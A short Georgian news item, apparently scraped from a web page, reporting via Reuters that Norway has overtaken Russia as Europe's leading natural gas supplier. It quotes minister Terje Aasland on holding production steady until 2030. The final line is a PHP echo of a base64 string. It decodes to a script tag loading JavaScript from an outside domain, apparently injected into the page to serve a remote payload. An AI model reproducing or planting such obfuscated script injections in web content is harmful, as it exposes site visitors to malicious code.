celsiusi
ავერსი საქკაბელი
ნორვეგია ევროპისთვის ბუნებრივი აირის მიწოდებაში ლიდერის როლს იკავებს, ბოლო მონაცემებით, ქვეყანამ რუსეთს გადაუსწრო, – ინფორმაციას „როიტერი“ ავრცელებს.
 
ნორვეგიის ენერგეტიკის მინისტრი ტიერე ასლანდი ამბობს, რომ ქვეყანა ბუნებრივი აირის წარმოების არსებულ მაღალ დონეზე შენარჩუნებას გეგმავს.
 
„ველოდებით, რომ შევძლებთ წარმოების არსებულ დონეზე შენარჩუნებას 2030 წლამდე“, – განაცხადა ასლანდმა.
 
ოფიციალური პროგნოზით, ნორვეგია ბუნებრივი აირის მოპოვების 2021 წლის მაჩვენებელთან შედარებით რვა პროცენტით გაზრდას აპირებს.
 
ქვეყანამ რუსეთს მას შემდეგ გადაასწრო, რაც რუსეთმა სანქციების საპასუხოდ გაზის ექსპორტი შეამცირა.
595
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");